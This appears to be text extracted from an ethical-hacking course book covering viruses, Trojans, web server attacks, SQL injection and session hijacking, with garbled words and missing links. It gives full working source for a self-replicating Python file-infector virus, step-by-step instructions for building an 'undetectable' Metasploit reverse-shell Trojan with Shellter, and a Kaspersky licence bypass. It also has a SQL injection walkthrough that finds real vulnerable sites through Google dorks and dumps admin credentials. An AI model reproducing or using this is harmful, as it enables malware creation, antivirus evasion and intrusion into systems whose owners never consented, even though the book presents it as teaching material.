2 # retrieve the virus code from the current infected script
3 virus_code = get_virus_code()
5 # look for other files to infect
6 for file in find_files_to_infect():
7 infect(file, virus_code)
9 # call the payload
10 summon_chaos()
12# except:

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Ethical Hacking Lab

62 13# pass
16 # d elete used names from memory
17 for i in list(globals().keys()):
18 if(i[0] != '_'):
19 exec('del {}'.format(i))
21 del i
Let’s analyze this code.
First of all, we call the get_virus_code() function, which returns the source
code of the virus taken from the current script.
Then, the find_files_to_infect() function will return the list of files that can
be infected and for each file returned, the virus will spread the infection.
After the infection took place, we just call the summ on_chaos() function,
that is - as suggested by its name - the payload function with the malware
everything has been inserted in a try-except block, so that to be sure that
exceptions on our virus code are trapped and ignored by the pass statement
in the except block.
The finally block is the last part of the virus, and its goal is to remove used
names from memory so that to be sure to have no impact on how the
infected script works.
Okay, now we need to implement the stub functions we have just create d!
Let’s start with the first one: the get_virus_code() function.
To get the current virus code, we will simply read the current script and
get what we find between two defined comments.
For example:
1def get_content_of_file(file):
2 data = None
3 with open(file, "r") as my_file:
4 data = my_file.readlines()

Page 63

Developing and implementing
63 6 return data
8def get_virus_code():
10 virus_code_on = False
11 virus_code = []
13 code = get_content_of_file(__file__)
15 for line in code:
16 i f "# begin -virus \n" in line:
17 virus_code_on = True
19 if virus_code_on:
20 virus_code.append(line)
22 if "# end -virus \n" in line:
23 virus_code_on = False
24 break
26 return virus_code
Now, let’s implement the find_files_to_infect() function. Here we will
write a simple function that returns all the *.py files in the current
directory. Easy enough to be tested and… safe enough so as not to damage
our current system! :)
1import glob
3def find_files_to_infect(directory = "."):
4 return [file for file in glob.glob("*.py")]

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Ethical Hacking Lab

64 This routine could also be a good candidate to be written with a generator.
What? You don’t know generators? Let’s have a look at this interesting
article then!
And once we have the list of files to be infected, we need the infection
function. In our case, we will just write our virus at the beginning of the
file we want to infect, like this :
1def get_content_if_infectable(file):
2 data = get_content_of_file(file)
3 for line in data:
4 if "# begin -virus" in line:
5 return None
6 return data
8def infect(file, virus_code):
9 if (data:=get_content_if_infec table(file)):
10 with open (file, "w") as infected_file:
11 infected_file.write("".join(virus_code))
12 infected_file.writelines(data)
Now, all we need is to add the payload. Since we don’t want to do
anything that can harm the system, let’s just create a function that prints
out something to the console.
1def summon_chaos():
2 # the virus payload
3 print("We are sick, fucked up and complicated \nWe are chaos, we can't
be cured")
Ok, our virus is ready! Let’s see the full source code:
1# begin -virus
3import glob
5def find_files_to_infect(directory = "."):
6 return [file for file in glob.glob("*.py")]

Page 65

Developing and implementing
65 7
8 def get_content_of_file(file):
9 data = None
10 with open(file, "r") as my_file:
11 data = my_file.r eadlines()
13 return data
15 def get_content_if_infectable(file):
16 data = get_content_of_file(file)
17 for line in data:
18 if "# begin -virus" in line:
19 return None
20 return data
22 def infect(file, virus_code):
23 if (data:=get_content_if_infectable(file)):
24 with open(file, "w") as infected_file:
25 infected_file.write("".join(virus_code))
26 infected_file.writelines(data)
28 def get_virus_code():
30 virus_code_on = False
31 vir us_code = []
33 code = get_content_of_file(__file__)
35 for line in code:

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Ethical Hacking Lab

66 36 if "# begin -virus \n" in line:
37 virus_code_on = True
39 if virus_code_on:
40 virus_code.append(line)
42 if "# end -virus \n" in line:
43 virus_code_on = False
44 break
46 return virus_code
48 def summon_chaos():
49 # the virus payload
50 print("We are sick, \n we can't be cured")
52# entry point
54 try:
55 # retrieve the virus code from the c urrent infected script
56 virus_code = get_virus_code()
58 # look for other files to infect
59 for file in find_files_to_infect():
60 infect(file, virus_code)
62 # call the payload
63 summon_chaos()

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Developing and implementing
67 65 # except:
66 # pass
68 finally:
69 # delete used names from memory
70 for i in list(globals().keys()):
71 if(i[0] != '_'):
72 exec('del {}'.format(i))
74 del i
76 # end -virus
Let’s try it putting this virus in a directory with just another .py file and let
see if the infection starts. Our victim will be a simple program
named [] ( that returns some random
numbers, like this:
1 #
3 import random
5 random.seed()
7 for _ in range(10):
8 print (random.rand int(0,100))
When this program is executed it returns 10 numbers between 0 and 100,
super useful!
Now, in the same directory, I have my virus. Let’s execute it:
1/playgrounds/python/first python ./
02:30:42 PM
2We are sick,
3we can't be cured

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Ethical Hacking Lab

68 As you can see, our virus has started and has executed the payload.
Everything is fine, but what happened to our []
( file? It should be the victim of the infec tion, so let’s
see its code now
copy 1# begin -virus
3import glob
5def find_files_to_infect(directory = "."):
6 return [file for file in glob.glob("*.py")]
8def get_content_of_file(file):
9 data = None
10 with open (file, "r") as my_fi le:
11 data = my_file.readlines()
13 return data
15 def get_content_if_infectable(file):
16 data = get_content_of_file(file)
17 for line in data:
18 if "# begin -virus" in line:
19 return None
20 return data
22 def infect(file, virus_code):
23 if (data:=get_content_if_infectable(file)):
24 with open (file, "w") as infected_file:
25 infected_file.write("".join(virus_code))
26 infected_file.writelines(data)

Page 69

Developing and implementing
69 27
28 def get_virus_code():
30 virus_code_on = False
31 virus_code = []
33 code = get_content_of_file(__file__)
35 for line in code:
36 if "# begin -virus \n" in line:
37 virus_code_on = True
39 if virus_code_on:
40 virus_code.a ppend(line)
42 if "# end -virus \n" in line:
43 virus_code_on = False
44 break
46 return virus_code
48 def summon_chaos():
49 # the virus payload
50 print ("We are sick, \n we can't be cured")
52 # entry point
54 try:
55 # retrieve the virus code from the current infected script

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Ethical Hacking Lab

70 56 virus_code = get_virus_code()
58 # look for other files to infect
59 for file in find_files_to_infect():
60 infect(file, virus_code)
62 # call the paylo ad
63 summon_chaos()
65 # except:
66 # pass
68 finally:
69 # delete used names from memory
70 for i in list(globals ().keys()):
71 if(i[0] != '_'):
72 exec('del {}'.format(i))
74 del i
76# end -virus
79import random
83for _ in range (10):
84 print (random.randint(0,100))

Page 71

Developing and implementing
And as expected, now we have our virus before the real code.
Let’s create another .py file in the same directory, just a simple “hello
world” program:
copy1/p laygrounds/python/first echo 'print("hello world")' >
and now, let’s execute the []( program:
1/playgrounds/python/first python
02:35:12 PM
2We are sick,
3 we can't be cured
As you can see, the program still does whatever it was expected to do
(extract some random numbers) but only after having executed our virus,
which has spread to other *.py files in the same directory and has executed
the payload function. Now, if you look at the [] ( )
file, you will see that it has been infected as well, as we can see running
1/playgrounds/python/first python
02:40:01 PM
2We are sick,
3we can't be cured
4hello world

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Ethical Hacking Lab

72 Creating a Tojran
Although a Trojan horse virus is referred to using the term vi rus, it is
actually a malicious code or software rather than a virus. A common type
of malware, a Trojan resembles a reputable, trusted application or file that
convinces the user it is safe to download onto computers or laptops. When
the user downloads an d executes the malicious software onto a device, the
malware contained within is activated. Once the Trojan malware is
downloaded and activated, cyber criminals can take control of the device
itself, lockout the user with ransomware attacks, or perform
whatever malicious threats the designer hand in mind.
How does Trojan Horses work?
Trojan viruses work by taking advantage of a lack of security knowledge
by the user and security measures on a computer, such as an antivirus and
antimalware software program. A Trojan typically appears as a piece of
malware attached to an email. The file, program, or application appears to
come from a trusted source. As the user views the email attachment, the
trusted source it comes from has the potential to be a ruse. The goal is to
get the user to download and open the file.
Once this happens, malware or other malicious content is installed and
activated on the computer or other devices. One common form of atta ck is
to have malicious content spread to other files on the device and damage
the computer. How it goes about doing this varies from one Trojan to the
next. It is all in the design and intent of the hackers that built the Trojan
One item to remem ber when adopting security measures to combat
Trojans is the performance of a Trojan. Although the term Trojan virus is
often used, Trojans are more accurately described as Trojan malware. A
virus is capable of executing and replicating itself on computers and
mobile devices. Trojan malware cannot do this. The user has to execute
the Trojan and it then goes on to perform the action designed by the
hackers behind it.
How Does a Trojan Horse Infect a Computer?
A Trojan horse infects a computer from the inside , much like the ancient
Greek’s Trojan horse. Just as Troy was tricked into bringing the horse in
thinking it was an honorary symbol to end the war, users download and
activate the Trojan horse on their own. How the Trojan horse infects a
computer depends on its design. The primary goal of a Trojan horse as it
infects a computer is to:
● Delete data on the device
● Copy data to steal and sell or use for other nefarious purposes
● Modify data
● Block data or access to data
● Disrupt the performance of the target compu ter and/or network

Page 73

Developing and implementing
73 What are the Types of Trojan Horse?
There are numerous different types of malware that threaten computers
and other devices in a Trojan attack. Trojan malware takes on various
forms and can infect a device from a number of different entr y points. The
following is a list of the common types of Trojan horse malware, but it
should not be considered an all -inclusive list of possible Trojan threats:
● Backdoor Trojan: these Trojans create a virtual “backdoor” to a
computer that allows hackers re mote access to the computer. As such,
hackers can download user data and easily steal it. Even worse, a
backdoor allows a cyber criminal to upload additional malware to the
● DDoS Trojan: known as a Distributed Denial of Service, these types
of Troja ns take down a network by flooding it with additional traffic it
cannot sustain.
● Downloader Trojan: this type of Trojan targets an already -infected
computer to download and install new versions of malicious threats.
This includes both Trojans and adware, a s examples.
● Fake AV Trojan: these Trojans behave like antivirus programs or
software, but rather than stealing data it seeks to demand money from
the user to detect and remove threats. These threats could be real or
● Game -thief Trojan: this type of Tr ojan is largely aimed at online
gamers and seeks to steal account information that could include credit
card information.
● Infostealer Trojan: this kind of malware does just as the name
suggests. It seeks to steal data on infected computers.
● Malfinder Troja n: the goal of this malware is to steal email addresses
accumulated on specific computers and devices.
● Ransom Trojan: one of the most troublesome Trojans, these threats
seek a financial ransom from the user to undo the damage to the
computer. It can also b lock data and impair the performance of the
● Remote Access Trojan: a remote access Trojan gives the attacker full
control over a computer using a remote network connection. There
multiples goals for this type of attack that include stealing inform ation
or spying on network activity.
How Do You Remove a Trojan?
If a user discovers a Trojan horse it can be removed using manual
operations or software programs. Removing a Trojan can be difficult
because it is possible for hidden files to exist on the c omputer. If a Trojan
horse is discovered, the malicious threats can be removed by

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Ethical Hacking Lab

74 ● Identifying the file or files infected and removing it from the system
● Disable the function of System restore
● Restart the computer and press F8 (Windows PCs) and select safe
mode to start up the computer
● Use Add or Remove Programs in the control panel to remove the
programs affected by the Trojan horse
● Remove extensions by deleting files of a program within the
Windows System folder
While you can follow these manual steps on a personal computer, it is not
an effective approach for Trojan viruses that infect enterprise computer
systems. In this case, the situation can be very complex and the best
approach is to seek outside help. The benefit for any enterprise network
using Avatara’s Complete Cloud platform is that its built -in security
systems constantly work to prevent Trojan horses and other malware to
avoid the problem in the first place.
Things You Will Need For Creatin g Tojran:
● Kali Linux
● Windows
● A No IP account with a domain name
● A forwarded port on your router
● Shellter
Part 1: Creating the DNS Payload
Using Kali:
1. Open Metasploit on Kali by typing msfconsole in a terminal.
2. Type use payload/windows/meterpreter/reverse_tcp_dns .
3. Type show options. This will show you that you need to set your
lhost and lport.
4. Type set lhost (hostname you created, without http://).
5. Type set lport (port you have forwarded on your router set for the
Kali machine).
6. Type generate -h. This will show you the options for generating the
payload. You can choose different options but at least do the
7. Type generate -f (file name you choose for the payload) -p windows
-t raw . Ex. generate -f DNS -p windows -t raw

Page 75

Developing and implementing
75 8. Exit the terminal and click on Files. Your payload will be in your
Home (Unless you set an option for a different location).
9. Transfer the created payload to Windows. (Be aware that your AV
might detect it at its current state).
Part 2: Creati ng the Executable File in Windows
1. Choose option that applies to you. (Important as Shellter does not
work with 64 -bit executables).
● 32-bit Windows - Navigate to C: \Windows \System32 \iexpress.exe
(Right click and select run as administrator)
● 64-bit Windows - Navigate to C: \Windows \Sys WOW64 \iexpress.
exe (Right click and select run as administrator)
1. Choose Create new Self Extraction Directive File and click next.
2. Click next on the Package Purpose page.
3. Type the title of the package. (This can be anything you wa nt) Ex:
4. No Prompt, click next.
5. Do not display a license. Click next.
6. Click Add and choose any file on your computer. I choose
Notepad.exe in the C: \Windows \System32 folder. Click Next.
7. Click the drop arrow and choose the file name you choose on the last
screen. Click Next.
8. Choose Hidden and then click next.
9. No Message. Click Next
10. Click Browse and type a name for your malware file and a
destination. Check the Hide File Extracting Progress Animation from
user. Click Next.
11. Select No restart and the n click next.
12. You can then either choose to save the self extraction directive or
don't save. Click Next.
13. Click Next again on the create Package. Then click Finish.
Part 3: Using Both Created Files in Shellter to Create Your Trojan
1. Open the folder that She llter is in. Right click on Shellter.exe and click
Run as Administrator.
2. Type A for Auto.

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Ethical Hacking Lab

76 3. Type N for No.
4. Type the location of your created EXE file from Part 2 and hit enter.
Let Shellter do it's thing for 30 seconds to a minute.
5. When asked to choose paylo ad, type C for custom.
6. Type the location of your created payload in Part 1 and hit enter.
7. Type N for No reflective DLL loader.
8. Hit enter and let Shellter finish doing it's thing If it says Injection
Verified! you should have a working undetectable Trojan.
9. Hit enter to exit Shellter.
Part 4: Set Up Your Listener
You can either use Metasploit or Armitage. I prefer Armitage so my
tutorial will be for that.
1. Go back to Kali.
2. Open Terminal and type Msfupdate
3. Once it's done type apt-get install armitage.
4. Type msfd b init
5. Open Armitage
6. Click Connect
7. Click Yes
8. Once Armitage opens type: use exploit/multi/handler
9. Type set lhost
10. Type set lport (your port you forwarded in your router)
11. Type set payload windows/meterpreter/reverse tcp dns
12. Type set exitonsession fals e
13. (Optional.) Type set autorunscript migrate -f
14. (Optional.) Type set prependmigrate True
15. Type exploit -j
(Optional steps are to migrate the process automatically so the session
does not end before you can do it manually)
Now you should be able to run your undetectable Trojan and get a
Meterpreter session.

Page 77

Developing and implementing
Malware is intrusive software that is designed to damage and destroy
computers and computer systems . Malware is a contraction for “malicious
software.” Examples of common malware includes viruses, worms, Trojan
viruses, spyware, adware, and ransomware.
1) The Basics of Hacking and Penetration Testing
2) Hacking: The Art of Exploitation
3) The Web Application Hacker’s Handbook: Finding and Exploiting
Security Flaws
1. Create a virus on your own using C/C++


Page 78

78 5
Unit Structure
5.0 Aim
5.1 File Inclusion attack simulation using DVWA, LAMP stack in
Debian 11.
5.1.1 Setting up Debian and LAMP stack there.
5.1.2 Setting DVWA website.
5.2 Disguise as Google Bot to vi ew hidden content of a website
5.2.1 Simulate GoogleBot to view hidden content of website
5.3 Kaspersky Lifetime Validity
5.3.1 Install Kaspersky AV
5.0 AIM:
Hacking a website by Remote File Inclusion, Disguise as Google Bot to
view hidden content of a website, to use Kaspersky for Lifetime without
Why use linux based server and not xampp or wamp in windows ?
The common reason being that the paths of resources we try to enter and
access in this attack are found only in linux and not in windows. So many
of these attack wont work in windows based servers.
5.1.1 Setting up Debian and LAMP stack there.
One can setup Debian as a virtual machine in virtual box, the steps to do
that are well versed in this resource : How To Install Debian 10 Buster
{Guide With Screenshots} ( . Hence I am not repeating
and writing it down again. For LAMP stack install ation I have followed
this resource : How To Install Linux, Apache, MariaDB, PHP (LAMP)
stack on Debian 10 | DigitalOcean . I don’t think I need to repeat the steps
Note : use bridged adapter to connect to the apache server from your
windows(host) web browser.

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Hacking web servers, web
79 5.1.2 Setting DVWA website.
Here I have downloaded the zip file and extracted it in /var/www/html
folder after installati on and entered the command
sudochmod -R 777 /var/www/html/dvwa
this command will allow the website to be hosted on apache.
Next I have also followed the readme in the dvwa zip file to setup the
database in mariadb
Note, if you are using MariaDB rather tha n MySQL (MariaDB is default
in debian), then you can't use the database root user, you must create a
new database user. To do this, connect to the database as the root user then
use the following commands:
mysql> create database dvwa;
Query OK, 1 row affected (0.00 sec)
mysql> create user dvwa@localhost identified by 'p@ssw0rd';
Query OK, 0 rows affected (0.01 sec)
mysql> grant all on dvwa.* to dvwa@localhost;
Query OK, 0 rows affected (0.01 sec)
mysql> flush privileges;
Query OK, 0 rows affected ( 0.00 sec)
Then keep the DVWA config to default containing
variables are set to the following by default:
$_DVWA[ 'db_ server'] = '';
$_DVWA[ 'db_ port'] = '3306';
$_DVWA[ 'db_ user' ] = 'dvwa';
$_DVWA[ 'db_ password' ] = 'p@ssw0rd';
$_DVWA[ 'db_ database' ] = 'dvwa';
At this point we need to change the phpini file located in
/etc/php/7.4/apache2 folder for php 7.4
To allow for
1. allow_url_fopen = On

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80 2. allow_rul_include = On
also find the ip address of the server using hostname,ifconfig,netstat
comman d
Now you can carry out file inclusion attack

Set the security level of DVWA to low
Then try the file inclusion attack by changing the path ?page=index.php
with /etc/passwd or any other linux folder.

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Hacking web servers, web
81 Quick way to setup the DVWA virtual machine
If you do not want to install from scratch :
Just download the ovf file and import it in virtualbox, it will create the
virtual machine with DVWA installed and all the configuration done.

5.2.1 Simulate GoogleBot to view hidden content of website
Usually we do this using a headless chrome browser(chrome without GUI)
and program it with JavaScript to automate web scraping.

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82 Googlebot does scrape the web and can read all things sent by the serv er
in response to the request, these things may include json,xml data as well
as certain components in webpage hidden from the end user by javaScript.
We can also simulate the GoogleBot by using Chrome Canary
Download Here :
Also one can read the step by step guide with screenshots to do the initial
setup of bot from
here : -googlebot -simulator/

So this can be a simulation.
This trick should work with old versions of Kaspersky AV software but it
has been a long time since this topic was relevant in hacking and authors
could perform this practical at that time. Since then Kaspersky has
changed a lot of things and this may not work at all.

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Hacking web servers, web
83 5.3.1 Install Kaspersky AV

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84 1. Then disable self defence in settings

2. Open regedit or registry editor in win dows

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Hacking web servers, web
85 3. Open Folder Path (for 32bit OS)
HKEY_LOCAL_MACHINE \SOFTWARE \KasperskyLab \protected \
APV8 \environment

4. Look for Product code (License code)

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86 5. Right Click on product code and modify it by changing last 3 -4
characters of the product key.

6. Close Re gistry edit and click on the Kaspersky icon in the
taskbar and exit it

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Hacking web servers, web
87 7. Turn on Kaspersky AV again and click on activate beta version

8. The trial license would have been activated had it been 2009,
since it is almost 13 years later the server has been upd ated and this
trick doesn’t work

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88 9. Lastly re -enable the self defence option

That was Kaspersky trial License extension by randomly creating new
productcode and trying to get another 30 day trial.


Page 89

89 6
Unit Structure
6.0 SQL Injection
6.1 SQL Injection For Website Hacking
6.2 Session Hijacking
6.3 Questions
6.4 Quiz
6.5 Video Links
6.6 Moocs
6.7 References
SQL Injection (SQLi) is a ty pe of an injection attack that makes it possible
to execute malicious SQL statements. These statements control a database
server behind a web application. Attackers can use SQL Injection
vulnerabilities to bypass application security measures.
An SQL Injec tion vulnerability may affect any website or web application
that uses an SQL database such as MySQL, Oracle, SQL Server, or others.
Criminals may use it to gain unauthorized access to your sensitive data:
customer information, personal data, trade secrets , intellectual property,
and more. SQL Injection attacks are one of the oldest, most prevalent, and
most dangerous web application vulnerabilities. The OWASP organization
(Open Web Application Security Project) lists injections in their OWASP
Top 10 2017 d ocument as the number one threat to web application

Fig 1. SQL Injection

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90 SQL Injection Attack Performed
SQL is a query language that was designed to manage data stored in
relational databases. You can use it to access, modify, and delete data.
Many web applications and websites store all the data in SQL databases.
Successful SQL Injection attack can have very serious consequences.
❖ Attackers can use SQL Injections to find the credentials of other
users in the database.
❖ An SQL Injection vulnerabi lity could allow the attacker to gain
complete access to all data in a database server.
❖ An attacker could use SQL Injection to alter balances, void
transactions, or transfer money to their account.
❖ Attacker can delete records from a database or even drop t ables.
❖ An attacker could use an SQL Injection as the initial vector and then
attack the internal network behind a firewall.
SQL Injection can be classified into three major categories –
1. In-band SQLi,
2. Inferential SQLi and
3. Out-of-band SQLi.
1. In -band SQ Li (Classic SQLi)
In-band SQL Injection occurs when an attacker is able to use the same
communication channel to both launch the attack and gather results.
The two most common types of in -band SQL Injection are
i. Error -based SQLi and
ii. Union -based SQLi.
Erro r-based SQLi
Error -based SQLi is an in -band SQL Injection technique that relies on
error messages thrown by the database server to obtain information about
the structure of the database.
Union -based SQLi
Union -based SQLi is an in -band SQL injection techni que that leverages
the UNION SQL operator to combine the results of two or more SELECT
statements into a single result which is then returned as part of the HTTP

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Sql injection and Session
91 2. Inferential SQLi (Blind SQLi)
Inferential SQL Injection, unlike in -band SQLi, ma y take longer for an
attacker to exploit, however, it is just as dangerous as any other form of
SQL Injection. In an inferential SQLi attack, no data is actually transferred
via the web application and the attacker would not be able to see the result
of an attack in -band (which is why such attacks are commonly referred to
as “blind SQL Injection attacks”). Instead, an attacker is able to
reconstruct the database structure by sending payloads, observing the web
application’s response and the resulting behavi or of the database server.
The two types of inferential SQL Injection are
i. Blind -boolean -based SQLi and
ii. Blind -time-based SQLi.
Boolean -based (content -based) Blind SQLi
Boolean -based SQL Injection is an inferential SQL Injection technique
that relies on se nding an SQL query to the database which forces the
application to return a different result depending on whether the query
returns a TRUE or FALSE result. Depending on the result, the content
within the HTTP response will change, or remain the same. This allows an
attacker to infer if the payload used returned true or false, even though no
data from the database is returned.
Time -based Blind SQLi
Time -based SQL Injection is an inferential SQL Injection technique that
relies on sending an SQL query to the database which forces the database
to wait for a specified amount of time (in seconds) before responding. The
response time will indicate to the attacker whether the result of the query
is TRUE or FALSE. Depending on the result, an HTTP response will be
returned with a delay, or returned immediately. This allows an attacker to
infer if the payload used returned true or false, even though no data from
the database is returned.
3. Out -of-band SQLi
Out-of-band SQL Injection occurs when an attacker is unable t o use the
same channel to launch the attack and gather results. Out -of-band
techniques, offer an attacker an alternative to inferential time -based
techniques, especially if the server responses are not very stable (making
an inferential time -based attack u nreliable).
Simple SQL Injection Example
The first example is very simple. It shows, how an attacker can use an
SQL Injection vulnerability to go around application security and
authenticate as the administrator.

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Ethical Hacking Lab

92 The following script is a simple example of authenticating with a
username and a password. The example database has a table named users
with the following columns: username and password.

These input fields are vulnerable to SQL Injection. An attacker could use
SQL commands in the input in a way t hat would alter the SQL statement
executed by the database server. For example, they could use a trick
involving a single quote and set the passwd field to:
password' OR 1=1
As a result, the database server runs the following SQL query:
SELECT id FROM users WHERE username= 'username' AND
password ='password' OR 1=1'
Because of the OR 1=1 statement, the WHERE clause returns the
first id from the users table no matter what
the username and password are. The first user id in a database is very
often the administ rator. In this way, the attacker not only bypasses
authentication but also gains administrator privileges. They can also
comment out the rest of the SQL statement to control the execution of the
SQL query further:
-- MySQL, MSSQL, Oracle, PostgreSQL, SQLit e
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1' %00
' OR '1'='1' %16
Union -Based SQL Injection
One of the most common types of SQL Injection uses the UNION
operator. It allows the attacker to combine the results of two or more

Page 93

Sql injection and Session
93 SELECT statements into a single result. The technique is called union -
based SQL Injection.
The following is an example of this technique. It uses the web
page , an intentionally vulnerable website hosted by
The following HTTP request is a normal request that a legitimate user
would send:
Host :

The artist parameter is vulnerable to SQL Injection. The following
payload mo difies the query to look for an inexistent record. It sets the
value in the URL query string to -1. Of course, it could be any other
value that does not exist in the database. However, a negative value is a
good guess because an identifier in a database is rarely a negative
In SQL Injection, the UNION operator is commonly used to attach a
malicious SQL query to the original query intended to be run by the web
application. The result of the injected query will be joined with the result
of the origina l query. This allows the attacker to obtain column values
from other tables.
SELECT 1, 2, 3 HTTP/1.1

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Ethical Hacking Lab


The following example shows how an SQL Injection payload could be
used to obtain more meaningful data from this intentionally vulnerable
SELECT 1,pass,cc FROM users WHERE uname='test' HTTP/1.1

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Sql injection and Session
95 Prevent SQL Injections (SQLi)
Step 1: Train and maintain awareness
Step 2: Don’t trust any user input
Step 3: Use whitelists, not blacklists
Step 4: Adopt the latest technologies
Step 5: Employ verified mechanisms
Step 6: Scan regularly (with Acunetix)
Train and maintain awareness
You should provide suitable security training to all your developers, QA
staff, DevOps, and SysAdmins.
Don’t trust any user input
Treat all user input as untrusted. Any user input that is used in an SQL
query introduces a risk of an SQL Injection.
Use whitelists, no t blacklists
Verify and filter user input using strict whitelists only.
Adopt the latest technologies
Use the latest version of the development environment and language and
the latest technologies associated with that environment/language.
Employ verified mechanisms
Use modern development technologies such mechanisms instead of trying
to reinvent the wheel.
Scan regularly
SQL Injections may be introduced by your developers or through external
libraries/modules/software. You should regularly scan your web
applications using a web vulnerability scanner.
Step 1: Finding Vulnerable Website:
We can find the Vulnerable websites(hackable websites) using Google
Dork list. google dork is searching for vulnerable websites using t he
google searching tricks. But we are going to use “inurl:” command for
finding the vulnerable websites.
Some Examples:

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Ethical Hacking Lab

96 inurl:article.php?id=
Here is the huge list of Google Dork…
So Start from the first website.

Note:if you like to hack particular website,then try this: dork_list_commands
for eg: inurl:index.php?id=
Step 2: Checking the Vulnerability:
In order to check the vulnerability ,add the single quotes(‘) at the end of
the url and hit enter.
For eg:'
If the page remain s in same page or showing that page not found or
showing some other webpages. Then it is not vulnerable.
If it showing any errors which is related to sql query,then it is vulnerable.
For eg:
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ”’ at line 1

Page 97

Sql injection and Session
Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the
number of columns in the table.
For that replace the sing le quotes(‘) with “order by n” statement.(leave one
space between number and order by n statement)
Change the n from 1,2,3,4,,5,6,…n. Until you get the error like “unknown
column “.
change the number until you get the error as “unknown column”
if you get t he error while trying the “x”th number,then no of column is “x -
I mean: order by 1(noerror) order by 2(noerror) order by 3(noerror ) order by 4(noerror) order by 5(noerror) order by 6(noerror) order by 7(noerror)
http://www order by 8(error)

so now x=8 , The number of column is x -1 i.e, 7.
Sometime the above may not work. At the time add the “ –” at the end of
the statement.
Step 4: Displaying the Vulnerable columns:
Using “union select column s_sequence ” we can find the vulnerable part of
the table. Replace the “order by n” with this statement. And change the id
value to negative(i mean id= -2,must change,but in some website may
work without changing).
Replace the columns_sequence with the no fr om 1 to x -1(number of
columns) separated with commas(,).
It will show some numbers in the page(it must be less than ‘x’ value, i
mean less than or equl to number of columns).
Like this:

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Ethical Hacking Lab


Now select 1 number.
It showing 3,7. Let’s take the Number 3.
Step 5: Finding version,database,user
Now replace the 3 from the query with “version()”
It will show the version as 5.0.1 or 4.3. something like this.
Replace the version() with database() and user() for finding the
database,user respectively.
Step 6: Finding t he Table Name if the version is 5 or above. Then follow
these steps. Now we have to find the table name of the database. Replace
the 3 with “group_concat(table_name) and add the “from
information_schema.tables where table_schema=database()”
Now it will s how the list of table names. Find the table name which is
related with the admin or user.

Now select the “admin ” table.
if the version is 4 or some others, you have to guess the table names. (user,
tbluser). It is hard and bore to do sql inection with version 4.
Step 7: Finding the Column Name
Now replace the “group_concat(table_name) with the
Replace the “from information_schema.tables where
table_schema=database() –” with “FROM information_schema.columns
WHERE table_name=mys qlchar –
Now listen carefully ,we have to find convert the table name to MySql
CHAR() string and replace mysqlchar with that .
Find MysqlChar() for Tablename:
First of all install the HackBar addon: -US/firefox/addon/3899/
select sql ->Mysql ->MysqlChar()

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Sql injection and Session

This will open the small window ,enter the table name which you found. i
am going to use the admin table name.

click ok
Now you can see the CHAR(num bers separated with commans) in the
Hack toolbar.

Copy and paste the code at the end of the url instead of the “mysqlchar”
For eg: -2 and 1=2 union select
1,2,group_concat(column_name),4,5,6,7 from
information_sch ema.columns where table_name=CHAR(97, 100, 109,
105, 110) –
Now it will show the list of columns.
rname,p assword..etc..
Now replace the replace group_concat(column_name) with
group_concat( columnname ,0x3a, anothercolumnname ).
Column name should be replaced from the listed column name.
another column name should be replace from the listed column name.

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Ethical Hacking Lab

100 Now replace t he ” from information_schema.columns where
table_name=CHAR(97, 100, 109, 105, 110)” with the “from table_name”
Now it will Username and passwords.
Step 8: Finding the Admin Panel:
Just try with url like: php
HTTP is stateless, so application designers had to develop a way to track
the state between multiple connections from th e same user, instead of
requesting the user to authenticate upon each click in a web application. A
session is a series of interactions between two communication end points
that occurs during the span of a single connection. Applications use
sessions to st ore parameters that are relevant to the user. The session is
kept "alive" on the server as long as the user is logged on to the system.
The session is destroyed when the user logs -out from the system or after a
predefined period of inactivity. When the ses sion is destroyed, the user's
data should also be deleted from the allocated memory space.
A session ID is an identification string (usually a long, random, alpha -
numeric string) that is transmitted between the client and the server.
Session IDs are common ly stored in cookies, URLs and hidden fields of
web pages.
The most popular session hijacking are
❖ session sniffing
❖ predictable session token ID
❖ man in the browser
❖ cross -site scripting
❖ session sidejacking
❖ session fixation

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Sql injection and Session
101 Session sniffing
This is one of the most basic techniques used with application -layer
session hijacking. The attacker uses a sniffer, such as Wireshark, or a
proxy, such as OWASP Zed, to capture network traffic containing the
session ID between a website and a cl ient.

Fig 2. Manipulating the token session executing the session hijacking
Predictable sessions token ID
Many web servers use a custom algorithm or predefined pattern to
generate session IDs. The greater the predictability of a session token, t he
weaker it is and the easier it is to predict. If the attacker can capture
several IDs and analyze the pattern, he may be able to predict a valid
session ID.
Man -in-the-browser attack
Once the victim is tricked into installing malware onto the system, th e
malware waits for the victim to visit a targeted site. The man -in-the-
browser malware can invisibly modify transaction information and it can
also create additional transactions without the user knowing.
Cross -site scripting
Cybercriminals exploit serve r or application vulnerabilities to inject client -
side scripts into web pages. This causes the browser to execute arbitrary
code when it loads a compromised page. If Http Only isn’t set in session
cookies, cybercriminals can gain access to the session key t hrough
injected scripts, giving them the information they need for session

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Ethical Hacking Lab

102 The example in figure 3 uses an XSS attack to show the cookie value of
the current session; using the same technique it’s possible to create a
specific JavaScript code t hat will send the cookie to the attacker.

Fig 3. Code Injection
Session side jacking.
Cybercriminals can use packet sniffing to monitor a victim’s network
traffic and intercept session cookies after the user has authenticated on the
server. If TLS encryption is only used for login pages and not for the
entire session, cybercriminals can hijack the session, act as the user within
the targeted web application.
Session fixation attacks
This technique steals a valid session ID that has yet to be authenticated.
Then, the attacker tries to trick the user into authenticating with this ID.
Once authenticated, the attacker now has access to the victim's computer.
Session fixation explores a limitation in the way the web a pplication
manages a session ID. Three common variations exist: session tokens
hidden in an URL argument, session tokens hidden in a form field and

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Sql injection and Session
103 session tokens hidden in a session cookie. The session hijack attack is very
stealthy. Session hijack attack s are usually waged against busy networks
with a high number of active communication sessions. The high network
utilization not only provides the attacker with a large number of sessions
to exploit, but it can also provide the attacker with a shroud of pro tection
due to a large number of active sessions on the server.
Attackers Gain from Session Hijacking?
When cybercriminals have hijacked a session, they can do virtually
anything that the legitimate user was authorized to do during the active
session. The most severe examples include transferring money from the
user’s bank account, buying merchandise from web stores, accessing
personally identifiable information (PII) for identity theft, and even
stealing data from company systems.
Examples of session hijac king attacks?
In September 2012, security researchers Thai Duong and Juliano Rizzo
announced CRIME, an attack takes advantage of an information leak in
the compression ratio of TLS requests as a side channel to enable them to
decrypt the requests made by the client to the server. This, in turn, allows
them to grab the user’s login cookie and then hijack the user’s session and
impersonate her on high -value destinations such as banks or e -commerce
